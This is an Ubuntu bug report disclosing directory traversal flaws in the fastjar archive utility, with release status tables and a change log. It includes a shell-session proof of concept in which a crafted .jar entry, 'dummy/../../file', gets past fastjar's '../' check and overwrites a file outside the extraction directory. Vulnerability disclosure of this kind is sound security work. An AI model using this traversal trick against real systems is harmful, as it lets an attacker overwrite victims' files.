Directory traversal vulnerabilities
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
fastjar (Ubuntu) |
Fix Released
|
Medium
|
Marc Deslauriers | ||
Hardy |
Fix Released
|
Undecided
|
Unassigned | ||
Jaunty |
Fix Released
|
Undecided
|
Unassigned | ||
Karmic |
Fix Released
|
Undecided
|
Unassigned | ||
Lucid |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Binary package hint: fastjar
The "fastjar" archive utility, installed on my Linux system as "/usr/bin/fastjar", is
vulnerable to directory traversal vulnerabilities. If an attacker can convince
a victim to extract a malicious .jar file, arbitrary files on disk may be
overwritten without prompting.
fastjar attempts to prevent directory traversal, presumably by checking if the
first several characters of a file included in the .jar archive are "../". For
example (my /usr/bin/jar is a symlink to fastjar):
=======
drosenbe@Dan:~/jar$ touch ../file
drosenbe@Dan:~/jar$ jar cvf evil.jar ../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/
adding: ../file (in=129) (out=93) (deflated 27%)
Total:
------
(in = 169) (out = 455) (deflated -169%)
drosenbe@Dan:~/jar$ jar -xvf evil.jar
created: META-INF/
extracted: META-INF/
Traversal to parent directories during unpacking!
=======
However, this can be subverted by creating a dummy folder and traversing from
there, as follows:
=======
drosenbe@Dan:~/jar$ echo "This is an evil file" > ../file
drosenbe@Dan:~/jar$ mkdir dummy
drosenbe@Dan:~/jar$ jar cvf evil.jar dummy/../../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/
adding: dummy/../../file (in=21) (out=21) (deflated 0%)
Total:
------
(in = 61) (out = 401) (deflated -557%)
drosenbe@Dan:~/jar$ echo "This is a good file" > ../file
drosenbe@Dan:~/jar$ cat ../file
This is a good file
drosenbe@Dan:~/jar$ jar xvf evil.jar
extracted: META-INF/
inflated: dummy/../../file
drosenbe@Dan:~/jar$ cat ../file
This is an evil file
=======
fastjar also allows the inclusion of full paths as file names, which will be
extracted and overwrite files without prompting. Archive programs such as jar
should take care to ensure that extracted contents remain in the current
directory and do not allow absolute paths or directory traversal, both of which
pose security vulnerabilities.
Please let me know if you have any trouble reproducing this issue or any
questions. I have confirmed that Sun's release of the "jar" utility is also vulnerable
to these issues, and I have contacted their security team.
Changed in fastjar (Ubuntu): | |
status: | New → Confirmed |
importance: | Undecided → Medium |
visibility: | private → public |
tags: | added: patch |
Changed in fastjar (Ubuntu): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
Changed in fastjar (Ubuntu Hardy): | |
status: | New → Confirmed |
Changed in fastjar (Ubuntu Lucid): | |
status: | New → Confirmed |
Changed in fastjar (Ubuntu Jaunty): | |
status: | New → Confirmed |
Changed in fastjar (Ubuntu Karmic): | |
status: | New → Confirmed |
Changed in fastjar (Ubuntu): | |
status: | Confirmed → Fix Released |
Incomplete fix for CVE-2006-3619?